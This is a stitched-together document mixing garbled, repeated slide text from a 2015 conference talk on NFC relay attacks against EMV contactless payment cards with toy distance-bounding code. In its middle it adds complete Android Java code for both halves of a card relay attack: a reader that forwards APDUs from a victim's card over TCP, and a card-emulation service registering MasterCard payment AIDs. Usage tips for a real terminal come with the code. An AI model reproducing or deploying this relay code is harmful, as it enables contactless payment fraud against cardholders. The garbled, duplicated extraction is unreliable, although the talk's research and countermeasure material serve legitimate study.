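    """Card side. processing_s models how quickly it answers one challenge bit."""

    def __init__(self, key: bytes, processing_s: float) -> None:
        self.key, self.processing_s = key, processing_s
        self.r0 = self.r1 = b""

    def commit(self, nv: bytes) -> bytes:
        """Answer the verifier nonce with a prover nonce and fix the registers."""
        np_ = secrets.token_bytes(8)
        self.r0, self.r1 = derive_registers(self.key, nv, np_)
        return np_

    def respond(self, i: int, challenge: int) -> int:
        return bit(self.r1 if challenge else self.r0, i)


class Verifier:
    """Terminal side. max_rtt_s bounds distance: RTT <= 2 * d / c + processing."""

    def __init__(self, key: bytes, max_rtt_s: float) -> None:
        self.key, self.max_rtt_s = key, max_rtt_s

    def run(self, prover: Prover, link_delay_s: float) -> Dict[str, object]:
        """link_delay_s is the one-way latency of whatever sits between the parties."""
        nv = secrets.token_bytes(8)
        np_ = prover.commit(nv)
        r0, r1 = derive_registers(self.key, nv, np_)
        wrong = slow = 0
        for i in range(ROUNDS):
            challenge = secrets.randbits(1)
            answer = prover.respond(i, challenge)
            rtt = 2 * link_delay_s + prover.processing_s       # simulated clock
            wrong += answer != bit(r1 if challenge else r0, i)
            slow += rtt > self.max_rtt_s
        return {"accepted": wrong == 0 and slow == 0, "wrong_bits": wrong, "slow_rounds": slow}


# Constructed parameters: a 10 cm NFC path is ~0.33 ns one way; a network hop
# in between adds milliseconds, which correct answers cannot hide.
KEY = bytes.fromhex("00112233445566778899aabbccddeeff")
MAX_RTT_S = 5e-6


def demo() -> Dict[str, Dict[str, object]]:
    verifier = Verifier(KEY, MAX_RTT_S)
    genuine = Prover(KEY, processing_s=1e-6)
    impostor = Prover(b"not the card key!", processing_s=1e-6)  # right distance, wrong key
    return {
        "direct": verifier.run(genuine, link_delay_s=0.33e-9),
        "relayed": verifier.run(genuine, link_delay_s=1e-3),
        "wrong_key": verifier.run(impostor, link_delay_s=0.33e-9),
    }
```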

Related Work
On relay attacks

2005-2009: First works, built on specific hardware
2010: Nokia mobile phones with NFC capability plus a Java MIDlet app
2012-2013: Relay attacks on Android accessing Secure Elements
  A SE securely stores data associated with credit/debit cards
  Needs a non-OTS Android device
2014: Active relay attacks with custom hardware and custom Android firmware
Several works studied the delay over the relay channel
  Relays over long distances are feasible → latency isn't a hard constraint

Ask us for specific references, too many names for a single slide

Conclusions (I)

Security of NFC is based on the physical proximity concern
NFC threats: eavesdropping, data modification, relay attacks
Android NFC-capable devices are rising
  Abuse to interact with cards in their proximity

Conclusions
  Review of Android NFC stack
  Proof-of-Concept of relay attacks using Android OTS devices
  Threat scenarios introduced
  Virtual pickpocketing attack may appear before long

Conclusions (II)
But then, what the hell can I do? Should I run away?

Conclusions (III)

Future Work
  Develop a botnet infrastructure and earn money
  Timing constraints of Android HCE mode
  Try active relay attacks within EMV contactless cards

Acknowledgments
  Spanish National Cybersecurity Institute (INCIBE)
  University of León under contract X43
  HITB staff

And thanks to all for hearing us!
Visit http://vwzq.net/relaynfc/ for more info about the project

Conclusions (III)

Future WorkDevelopa botnetinfrastructureandearnmoney

Timing constraints of Android HCE mode

Try active relay attacks within EMV contactless cards

AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)

University of Leon under contract X43

HITB staff

And thanks to all for hearing us

Visit httpvwzqnetrelaynfc for more info about the project

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36

Relay Attacks in EMV Contactless Cardswith Android OTS Devices

Jose Viladagger Ricardo J RodrıguezDagger

pvtolkiengmailcom rjrodriguezunileoneslaquo All wrongs reversed

daggerComputer Science and daggerResearch Institute ofSystems Engineering Dept Applied Sciences in Cybersecurity

University of Zaragoza Spain University of Leon Spain

May 28 2015

Hack in the Box 2015Amsterdam (Nederland)

  • Introduction
  • Background
    • EMV Contactless Cards
    • Relay Attacks and Mafia Frauds
      • Android and NFC A Tale of Lve
        • Evolution of NFC Support in Android
        • Practical Implementation Alternatives in Android
          • Relay Attack Implementation
            • Demo experiment
            • Threat Scenarios
            • Resistant Mechanisms
              • Related Work
              • Conclusions
Page 4: Attacks in EMV Contactless Cards with Android OTS ... - · PDF fileRelay Attacks in EMV Contactless Cards with Android OTS Devices Jose Vila´ y, Ricardo J. Rodr´ıguez z pvtolkien@gmail.com,

Agenda

1 Introduction

2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds

3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android

4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms

5 Related Work

6 Conclusions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 4 36

Introduction to NFC (I)

What is NFCBidirectional short-range contactless communication technology

Up to 10 cm

Based on RFID standards works in the 1356 MHz spectrum

Data transfer rates vary 106 216 and 424 kbps

Security based on proximity concern physical constraints

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 5 36

Introduction to NFC (I)

What is NFCBidirectional short-range contactless communication technology

Up to 10 cm

Based on RFID standards works in the 1356 MHz spectrum

Data transfer rates vary 106 216 and 424 kbps

Security based on proximity concern physical constraints

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 5 36

Introduction to NFC (II)

Wow NFC sounds pretty hipsterTwo main elements

Proximity Coupling Device (PCD also NFC-capable device)Proximity Integrated Circuit Cards (PICC also NFC tags)

Three operation modesPeer to peer direct communication between partiesReadwrite communication with a NFC tagCard-emulation an NFC device behaves as a tag

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 6 36

Introduction to NFC (III)

ISOIEC 14443 standardFour-part international standard forcontactless smartcards

1 Size physical characteristics etc2 RF power and signalling schemes

(Type A amp B)Half-duplex 106 kbps rate

3 Initialization + anticollision protocol4 Data transmission protocol

IsoDep cards compliant with the fourparts

Example contactless payment cards

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 7 36

Introduction to NFC (IV)

ISOIEC 7816Fifteen-part international standard related to contacted integratedcircuit cards especially smartcards

Application Protocol Data Units (APDUs)

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 8 36

Introduction to NFC (V)

[Taken from 1356 MHz RFID Proximity Antennas (httpwwwnxpcomdocumentsapplication_noteAN78010pdf)]

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 9 36

Introduction to NFC (V)

[Taken from 1356 MHz RFID Proximity Antennas (httpwwwnxpcomdocumentsapplication_noteAN78010pdf)]

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 9 36

Introduction to NFC (VI)

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 10 36

Introduction to NFC (VII)

Ok So is it secure right Right

If it were so secure you would not be staring at us uml

NFC security threatsEavesdropping

Secure communication as solution

Data modification (ie alteration insertion or destruction)Feasible in theory (but requires quite advanced RF knowledge)

RelaysForwarding of wireless communicationTwo types passive (just forwards) or active (forwards and alters thedata)

We focus on passive relay attacks

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 11 36

Introduction to NFC (VII)

Ok So is it secure right RightIf it were so secure you would not be staring at us uml

NFC security threatsEavesdropping

Secure communication as solution

Data modification (ie alteration insertion or destruction)Feasible in theory (but requires quite advanced RF knowledge)

RelaysForwarding of wireless communicationTwo types passive (just forwards) or active (forwards and alters thedata)

We focus on passive relay attacks

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 11 36

Introduction to NFC (VII)

Ok So is it secure right RightIf it were so secure you would not be staring at us uml

NFC security threatsEavesdropping

Secure communication as solution

Data modification (ie alteration insertion or destruction)Feasible in theory (but requires quite advanced RF knowledge)

RelaysForwarding of wireless communicationTwo types passive (just forwards) or active (forwards and alters thedata)

We focus on passive relay attacks

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 11 36

Introduction to NFC (VII)

Ok So is it secure right RightIf it were so secure you would not be staring at us uml

NFC security threatsEavesdropping

Secure communication as solution

Data modification (ie alteration insertion or destruction)Feasible in theory (but requires quite advanced RF knowledge)

RelaysForwarding of wireless communicationTwo types passive (just forwards) or active (forwards and alters thedata)

We focus on passive relay attacks

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 11 36

Introduction to NFC (VIII)

NFC brings ldquocardsrdquo to mobile devicesPayment sector is quite interested in this newway for making payments

500M NFC payment users expected by 2019

Almost 300 smart phones available at themoment with NFC capabilities

Check httpwwwnfcworldcomnfc-phones-list

Most of them runs Android OS

Research HypothesisCan a passive relay attack be performed in contactless paymentcards using an Android NFC-capable device

If so what are the constraints (whether any exists)

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 12 36

Introduction to NFC (VIII)

NFC brings ldquocardsrdquo to mobile devicesPayment sector is quite interested in this newway for making payments

500M NFC payment users expected by 2019

Almost 300 smart phones available at themoment with NFC capabilities

Check httpwwwnfcworldcomnfc-phones-list

Most of them runs Android OS

Research HypothesisCan a passive relay attack be performed in contactless paymentcards using an Android NFC-capable device

If so what are the constraints (whether any exists)

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 12 36

Agenda

1 Introduction

2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds

3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android

4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms

5 Related Work

6 Conclusions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 13 36

Background (I)EMV contactless cards

Europay Mastercard and VISA standard for inter-operation of ICcards Point-of-Sale terminals and automated teller machines

Authenticating credit and debit card transactionsCommands defined in ISOIEC 7816-3 and ISOIEC 7816-4(httpenwikipediaorgwikiEMV)

Application ID (AID) command

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 14 36

Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay

Are they secure

Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100

cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)

Sequential contactless payments limited ndash it asks for the PIN

Protected by the same fraud guarantee as standard transactions(hopefully)

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36

Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay

Are they secure

Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100

cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)

Sequential contactless payments limited ndash it asks for the PIN

Protected by the same fraud guarantee as standard transactions(hopefully)

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36

Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay

Are they secure

Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100

cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)

Sequential contactless payments limited ndash it asks for the PIN

Protected by the same fraud guarantee as standard transactions(hopefully)

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36

Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay

Are they secure

Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100

cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)

Sequential contactless payments limited ndash it asks for the PIN

Protected by the same fraud guarantee as standard transactions(hopefully)

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36

Background (III)

Relay attacksldquoOn Numbers and Gamesrdquo J H Conway(1976)

Mafia frauds ndash Y Desmedt (SecuriComrsquo88)

P minusrarr V communication link P minusrarr V

Real-time fraud where a fraudulent prover P and verifierV cooperate

Honest prover and verifier contactless card and Point-of-Sale terminalDishonest prover and verifier two NFC-enabled Android devices



Android and NFC: A Tale of L♥ve (I): Recap on the evolution of Android NFC support

[Timeline figure, reconstructed as a list: the tag technologies and the NFC operation modes each Android release supports]

Android 2.3.3 Gingerbread (API level 10): tag technologies NfcA (ISO/IEC 14443-3A), NfcB (ISO/IEC 14443-3B), NfcF (JIS 6319-4), NfcV (ISO/IEC 15693), IsoDep (ISO/IEC 14443-4), Ndef, NdefFormatable, MifareClassic and MifareUltralight. Operation modes: reader/writer and peer-to-peer in software; card emulation only in hardware (secure element).

Android CyanogenMod OS 9.1: IsoPcdA (ISO/IEC 14443-4A) and IsoPcdB (ISO/IEC 14443-4B), i.e. software card emulation, thanks to Doug Yeager.

Android 4.2 Jelly Bean (API level 17): NfcBarcode.

Android 4.4 KitKat (API level 19): host-based card emulation arrives in stock Android and NfcAdapter.ReaderCallback is added. Operation modes: reader/writer, peer-to-peer and card emulation in software, plus hardware card emulation.


Android and NFC: A Tale of L♥ve (II): Digging into the Android NFC stack

Event-driven framework, nice API support.
Two native implementations (depending on the built-in NFC chip): libnfc-nxp and libnfc-nci.
libnfc-nxp was dropped in favour of NCI (NFC Controller Interface):
open architecture, not focused on a single chip family;
open interface between the NFC Controller (NFCC) and the Device Host (DH);
standard proposed by the NFC Forum.


Android and NFC: A Tale of L♥ve (III): Digging into the Android NFC stack – Reader/Writer mode

The mode cannot be enabled directly by an app: it is tied to an Android activity in the foreground.
The Android NFC service picks the app that receives the tag according to the tag (intent-filter) definitions in its Manifest file.
At low level, libnfc-nci uses a reliable mechanism of queues and message passing, the General Kernel Interface (GKI), which makes communication between layers and modules easier.

[Sequence diagram, reconstructed: the path of one transceive() call from a user app down to the controller]
User App → Tag.transceive() (NFC developer framework) → mTagService.transceive() → IPC → TagService inside NfcService → DeviceHost.TagEndpoint, realized by NativeNfcTag → JNI doTransceive() → NativeNfcTag.cpp (System NFC library) → libnfc-nci

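What the call path above looks like from the app side, as an added example that is not the authors' ±2000-LOC app: the dishonest-verifier half of an APDU-level relay, an activity that switches the phone into reader mode, takes the ISO-DEP card it finds and answers every C-APDU that arrives from the dishonest prover with the R-APDU the real card returns. The relay channel is an assumption (a TCP connection to a placeholder RELAY_HOST/RELAY_PORT, each APDU framed as a 2-byte big-endian length plus the bytes); the package name is hypothetical. It is written against the public android.nfc API of Android 4.4, although reader/writer mode itself has been available since 2.3.3.

```java
// Added example, not the authors' app: the dishonest-verifier half of the relay.
package net.example.relay;   // hypothetical package

import android.app.Activity;
import android.nfc.NfcAdapter;
import android.nfc.Tag;
import android.nfc.tech.IsoDep;
import android.os.Bundle;
import android.util.Log;

import java.io.DataInputStream;
import java.io.DataOutputStream;
import java.io.IOException;
import java.net.Socket;

public class DishonestVerifierActivity extends Activity implements NfcAdapter.ReaderCallback {
    private static final String TAG = "RelayVerifier";
    private static final String RELAY_HOST = "192.0.2.10";  // placeholder (TEST-NET-1 address)
    private static final int RELAY_PORT = 4444;             // placeholder
    // Upper bound of the card's own response time: ISO/IEC 14443-4 FWT at FWI = 14 is ~4.95 s.
    private static final int ISODEP_TIMEOUT_MS = 5000;

    private NfcAdapter adapter;

    @Override protected void onCreate(Bundle saved) {
        super.onCreate(saved);
        adapter = NfcAdapter.getDefaultAdapter(this);
    }

    // Reader mode belongs to a foreground activity; there is no way to turn it on from a
    // service. Skipping the NDEF check keeps the framework from issuing its own commands
    // to the card, and a long presence-check delay keeps the poll loop from interrupting
    // a slow relay round trip.
    @Override protected void onResume() {
        super.onResume();
        Bundle extras = new Bundle();
        extras.putInt(NfcAdapter.EXTRA_READER_PRESENCE_CHECK_DELAY, 5000);
        adapter.enableReaderMode(this, this,
                NfcAdapter.FLAG_READER_NFC_A | NfcAdapter.FLAG_READER_NFC_B
                        | NfcAdapter.FLAG_READER_SKIP_NDEF_CHECK
                        | NfcAdapter.FLAG_READER_NO_PLATFORM_SOUNDS,
                extras);
    }

    @Override protected void onPause() {
        super.onPause();
        adapter.disableReaderMode(this);
    }

    // Delivered on a binder thread, so blocking socket and card I/O is allowed here.
    @Override public void onTagDiscovered(Tag tag) {
        IsoDep card = IsoDep.get(tag);   // null for tags below ISO/IEC 14443-4, e.g. MIFARE Classic
        if (card == null) {
            Log.w(TAG, "not an ISO-DEP card, nothing to relay");
            return;
        }
        try (Socket link = new Socket(RELAY_HOST, RELAY_PORT);
             DataInputStream in = new DataInputStream(link.getInputStream());
             DataOutputStream out = new DataOutputStream(link.getOutputStream())) {
            link.setTcpNoDelay(true);                  // every millisecond counts against FWT
            card.connect();
            card.setTimeout(ISODEP_TIMEOUT_MS);
            // Each frame is a 2-byte big-endian length plus the APDU; a zero-length frame
            // from the prover means the terminal deselected it, so we release the card.
            while (card.isConnected()) {
                int len = in.readUnsignedShort();
                if (len == 0) break;
                byte[] capdu = new byte[len];
                in.readFully(capdu);                    // C-APDU coming from the real terminal
                byte[] rapdu = card.transceive(capdu);  // R-APDU from the real card
                out.writeShort(rapdu.length);
                out.write(rapdu);
                out.flush();
            }
        } catch (IOException e) {
            Log.e(TAG, "relay link or card lost", e);
        } finally {
            try { card.close(); } catch (IOException ignored) { }
        }
    }
}
```

Two things to keep in mind when running this: the activity needs the NFC and INTERNET permissions in its manifest, and the relay channel must stay connected for the whole transaction, because the real terminal issues several APDUs (SELECT, GET PROCESSING OPTIONS, READ RECORD, GENERATE AC) against the same card session.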

Android and NFC: A Tale of L♥ve (IV): Digging into the Android NFC stack – HCE mode

A service must be implemented to process commands and replies: extend the HostApduService abstract class and implement its processCommandApdu method.
Routing is AID-based: the NFC service keeps a routing table that maps each AID to the service that registered it.
This means you need to declare in advance which AIDs you handle.

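The other half, as an added example and again not the authors' code: an Android 4.4 HostApduService acting as the dishonest prover. Every C-APDU the NFC service routes to it goes over the relay channel to the dishonest verifier, and the R-APDU that comes back is handed to the terminal. Assumptions: the service is declared in the manifest with the HOST_APDU_SERVICE intent filter, the BIND_NFC_SERVICE permission and a meta-data entry pointing at res/xml/apduservice.xml; the relay channel is a TCP listener on a placeholder port with 2-byte length-prefixed frames; the package name is hypothetical. The two AIDs in the filter are the ones a terminal SELECTs when talking to a MasterCard card: the PPSE name "2PAY.SYS.DDF01" (hex 325041592E5359532E4444463031), which every EMV contactless transaction starts with, and the MasterCard credit/debit AID A0000000041010. Both must be declared because HCE only delivers APDUs whose SELECT names a registered AID, which is exactly the "AID known in advance" constraint.

```java
// Added example, not the authors' app. res/xml/apduservice.xml, referenced from the
// manifest, declares the AIDs up front (category "other" avoids having to be the default
// payment app; requireDeviceUnlock="false" lets a locked phone with its screen on answer):
//   <host-apdu-service xmlns:android="http://schemas.android.com/apk/res/android"
//       android:description="@string/relay_desc" android:requireDeviceUnlock="false">
//     <aid-group android:description="@string/relay_desc" android:category="other">
//       <aid-filter android:name="325041592E5359532E4444463031"/>   PPSE "2PAY.SYS.DDF01"
//       <aid-filter android:name="A0000000041010"/>                 MasterCard credit/debit
//     </aid-group>
//   </host-apdu-service>
package net.example.relay;   // hypothetical package

import android.nfc.cardemulation.HostApduService;
import android.os.Bundle;
import android.util.Log;

import java.io.DataInputStream;
import java.io.DataOutputStream;
import java.io.IOException;
import java.net.ServerSocket;
import java.net.Socket;
import java.util.concurrent.ExecutorService;
import java.util.concurrent.Executors;

public class DishonestProverService extends HostApduService {
    private static final String TAG = "RelayProver";
    private static final int RELAY_PORT = 4444;                    // placeholder
    private static final byte[] SW_NO_LINK = {(byte) 0x6F, 0x00};  // SW 6F00: no precise diagnosis

    // One worker thread: accept() runs first, then APDUs are relayed strictly in order,
    // and in/out are only ever touched from this thread.
    private final ExecutorService worker = Executors.newSingleThreadExecutor();
    private DataInputStream in;
    private DataOutputStream out;

    @Override public void onCreate() {
        super.onCreate();
        worker.execute(new Runnable() {
            @Override public void run() {
                try {
                    Socket link = new ServerSocket(RELAY_PORT).accept();  // verifier connects here
                    link.setTcpNoDelay(true);                             // latency beats throughput
                    in = new DataInputStream(link.getInputStream());
                    out = new DataOutputStream(link.getOutputStream());
                } catch (IOException e) {
                    Log.e(TAG, "relay listener failed", e);
                }
            }
        });
    }

    // NfcService calls this on the main thread for each C-APDU routed to one of our AIDs,
    // starting with the terminal's SELECT. Network I/O is forbidden on that thread, so the
    // round trip goes to the worker and the answer is delivered with sendResponseApdu();
    // returning null tells the framework that the response will follow.
    @Override public byte[] processCommandApdu(final byte[] capdu, Bundle extras) {
        worker.execute(new Runnable() {
            @Override public void run() {
                byte[] rapdu = SW_NO_LINK;
                if (out != null) {
                    try {
                        out.writeShort(capdu.length);
                        out.write(capdu);
                        out.flush();
                        int len = in.readUnsignedShort();
                        rapdu = new byte[len];
                        in.readFully(rapdu);
                    } catch (IOException e) {
                        Log.e(TAG, "relay link lost mid-transaction", e);
                        rapdu = SW_NO_LINK;
                    }
                }
                sendResponseApdu(rapdu);
            }
        });
        return null;
    }

    // Terminal deselected us or the field dropped: a zero-length frame tells the verifier
    // to release the card.
    @Override public void onDeactivated(int reason) {
        worker.execute(new Runnable() {
            @Override public void run() {
                try { if (out != null) { out.writeShort(0); out.flush(); } }
                catch (IOException ignored) { }
            }
        });
    }
}
```

The framework only creates an HCE service lazily, when the first matching SELECT arrives, so start it yourself with startService() from the app's UI before the phone is tapped on the terminal; that way the listener is already accepting when NfcService binds. The whole relayed round trip, including the verifier's own card access, has to fit the terminal's frame waiting time, which is the timing limitation discussed further on.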

Android and NFC: A Tale of L♥ve (V): Digging into the Android NFC stack – Summary

Description                                       | Language(s) | Dependency                | OSS
NFC developer framework (com.android.nfc package) | Java, C++   | API level                 | Yes
System NFC library (libnfc-nxp or libnfc-nci)     | C/C++       | Manufacturer              | Yes
NFC Android kernel driver                         | C           | Hardware and manufacturer | Yes
NFC firmware (/system/vendor/firmware directory)  | ARM Thumb   | Hardware and manufacturer | No

Some useful links:
https://android.googlesource.com/platform/frameworks/base/+/master/core/java/android/nfc
https://android.googlesource.com/platform/packages/apps/Nfc/+/master/src/com/android/nfc
https://android.googlesource.com/platform/packages/apps/Nfc/+/master/nci
https://android.googlesource.com/platform/external/libnfc-nci/+/master/src
http://nfc-forum.org/our-work/specifications-and-application-documents/specifications/nfc-controller-interface-nci-specifications
http://www.cardsys.dk/download/NFC_Docs/NFC%20Controller%20Interface%20(NCI)%20Technical%20Specification.pdf
http://www.datasheet4u.com/PDF/845670/BCM20793S.html
http://www.datasheet4u.com/PDF/845671/BCM20793SKMLG.html


Android and NFC: A Tale of L♥ve (VI): Some remarkable limitations

Limitation 1: the dishonest verifier communicates with a MIFARE Classic card.
libnfc-nci does not allow sending raw ISO/IEC 14443-3 commands, because the CRC is computed by the NFC controller (NFCC).
Overcome only if the NFCC firmware is modified.
EMV contactless cards are IsoDep, i.e. fully ISO/IEC 14443-4 compliant, so this limitation does not affect them.

Limitation 2: the dishonest prover communicates with an honest verifier (device in HCE mode).
The AID must be known in advance, since it has to be declared in the service's AID filter.
Overcome if the device is rooted: the Xposed framework can hook the routing, but that needs root permissions.


Android and NFC: A Tale of L♥ve (VII): Some remarkable limitations and remarks

Limitation 3: the dishonest prover and the dishonest verifier communicate through a non-reliable peer-to-peer relay channel.
ISO/IEC 14443-4 defines the Frame Waiting Time as FWT = 256 · (16/fc) · 2^FWI, 0 ≤ FWI ≤ 14, where fc = 13.56 MHz.
FWT ∈ [≈302 µs, ≈4.95 s] → a relay is theoretically possible when the delay it adds is ≤ 5 s.

Concluding remarks:
Any NFC-enabled device running OTS Android ≥ 4.4 can perform an NFC passive relay attack at APDU level when the specific AID of the honest prover is known and an explicit SELECT is performed.
Any communication involving an APDU-compliant NFC tag (e.g. MIFARE DESFire EV1, Inside MicroPass or Infineon SLE66CL) can also be relayed.

And now, let's move on to the practice.

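To make the FWT bound concrete, here is an added example (plain Java, not part of the talk) that evaluates the formula above for every FWI, reads the FWI a card announces in the TB(1) byte of its Answer To Select (ATS), and checks whether a measured relay delay fits inside the card's FWT without a waiting-time extension. The ATS bytes are constructed for illustration. Caveat for anyone trying this on a phone: Android's IsoDep exposes only the historical bytes of the ATS, not TB(1), so the FWI has to be read with a full reader or assumed.

```java
// Added example, not from the talk: ISO/IEC 14443-4 frame waiting time from the FWI.
public final class FrameWaitingTime {
    static final double FC_HZ = 13.56e6;   // carrier frequency fc

    // FWT = 256 * (16 / fc) * 2^FWI, 0 <= FWI <= 14, returned in microseconds.
    public static double fwtMicros(int fwi) {
        if (fwi < 0 || fwi > 14) throw new IllegalArgumentException("FWI out of range");
        return 256.0 * (16.0 / FC_HZ) * (1 << fwi) * 1e6;
    }

    // ATS = TL T0 [TA1] [TB1] [TC1] [historical bytes]. T0 bits 5, 6 and 7 flag the presence
    // of TA1, TB1 and TC1; TB1 carries FWI in its high nibble and SFGI in the low one.
    // When TB1 is absent the standard's default FWI of 4 applies.
    public static int fwiFromAts(byte[] ats) {
        if (ats.length < 2 || (ats[0] & 0xFF) != ats.length)
            throw new IllegalArgumentException("malformed ATS: TL does not match length");
        int t0 = ats[1] & 0xFF;
        int idx = 2;
        if ((t0 & 0x10) != 0) idx++;            // skip TA1
        if ((t0 & 0x20) == 0) return 4;         // no TB1: default
        return (ats[idx] & 0xF0) >>> 4;
    }

    // A passive relay adds its channel delay on top of the card's own response time. If the
    // sum exceeds FWT, the emulated card must ask for an extension (S(WTX) frame) or the
    // terminal gives up on the frame.
    public static boolean relayFitsWithoutWtx(int fwi, double cardMicros, double relayMicros) {
        return cardMicros + relayMicros <= fwtMicros(fwi);
    }

    // Constructed sample ATS: TL=0B, T0=78 (TA1, TB1, TC1 present; FSCI 8), TA1=80,
    // TB1=81 (FWI 8, SFGI 1), TC1=02, then six historical bytes.
    static final byte[] SAMPLE_ATS = {0x0B, 0x78, (byte) 0x80, (byte) 0x81, 0x02,
                                      0x4B, 0x4F, 0x4E, 0x41, 0x14, 0x11};

    public static void main(String[] args) {
        for (int fwi = 0; fwi <= 14; fwi++)
            System.out.printf("FWI %2d -> FWT %12.1f us%n", fwi, fwtMicros(fwi));
        int fwi = fwiFromAts(SAMPLE_ATS);
        System.out.printf("sample card: FWI %d, FWT %.1f ms%n", fwi, fwtMicros(fwi) / 1000);
        // A 5 ms card answer plus 60 ms over Wi-Fi, versus the same card plus 2 s over mobile data.
        System.out.println("fits over Wi-Fi:  " + relayFitsWithoutWtx(fwi, 5_000, 60_000));
        System.out.println("fits over 3G:     " + relayFitsWithoutWtx(fwi, 5_000, 2_000_000));
    }
}
```

With FWI = 8 the sample card allows about 77 ms per frame, so a relay over a local Wi-Fi link fits but one over a mobile-data link does not; the HCE side survives the latter only because the NFC controller can stretch the wait with S(WTX) requests, which is why the slide treats 5 s (FWI = 14) as the practical ceiling rather than the card's own FWI.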


Relay Attack Implementation (I): Experiment configuration

PoS device: Ingenico IWL280 with GPRS + NFC support.
Android app developed (±2000 LOC).
Two OTS Android NFC-capable devices.
One constraint: only the dishonest prover must run Android ≥ 4.4 (it needs HCE); the dishonest verifier only needs reader/writer mode, available since Android 2.3.3.


Relay Attack Implementation (II): Threat scenarios – Scenario 1: Distributed mafia fraud

[Figure: a BOTMASTER node connected to several BOT nodes, i.e. NFC-capable phones under the botmaster's control, each one able to act as the dishonest verifier for a card in its proximity.]


Relay Attack Implementation (III): Threat scenarios – Scenario 2: Hiding fraud locations

[Image-only slide]


Relay Attack Implementation (IV): Resistant mechanisms

Brief summary of resistant mechanisms:

Distance-bounding protocols: upper-bound the physical distance using the round-trip time of cryptographic challenge-response messages.

Timing constraints: not enforced in current NFC-capable systems, and the protocol itself allows timing-extension commands (S(WTX)).

Physical countermeasures:
Whitelisting/blacklisting: random UID in HCE mode → unfeasible
RFID-blocking covers
Physical button/switch activation
Secondary authentication methods (e.g. on-card fingerprint scanners)

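What the first of those mechanisms looks like in code, as an added example that is not from the talk: a toy Hancke-Kuhn style distance-bounding exchange. Verifier and prover share a key, derive two response bit-strings R0 and R1 from HMAC(key, NV || NP) after exchanging nonces, and then run n rapid single-bit rounds in which the verifier times each round and rejects the prover if any response bit is wrong or any round trip exceeds the bound. A relay cannot undo the propagation delay it adds, so it shows up as late rounds. Timing here is wall-clock inside one JVM, so the bound is set far looser than the nanoseconds real hardware would use; the key and nonces are generated on the spot.

```java
// Added example, not from the talk: a toy Hancke-Kuhn distance-bounding check.
import java.security.SecureRandom;
import javax.crypto.Mac;
import javax.crypto.spec.SecretKeySpec;

public final class DistanceBounding {
    public static final int ROUNDS = 32;   // rapid bit-exchange rounds; R0 = bits 0..31, R1 = 32..63

    // Anything that answers a challenge bit: the honest prover, or a relay in front of it.
    public interface Responder { int respond(int challengeBit); }

    static byte[] hmac(byte[] key, byte[] msg) throws Exception {
        Mac mac = Mac.getInstance("HmacSHA256");
        mac.init(new SecretKeySpec(key, "HmacSHA256"));
        return mac.doFinal(msg);
    }

    static int bit(byte[] s, int i) { return (s[i / 8] >>> (7 - i % 8)) & 1; }

    static byte[] concat(byte[] a, byte[] b) {
        byte[] r = new byte[a.length + b.length];
        System.arraycopy(a, 0, r, 0, a.length);
        System.arraycopy(b, 0, r, a.length, b.length);
        return r;
    }

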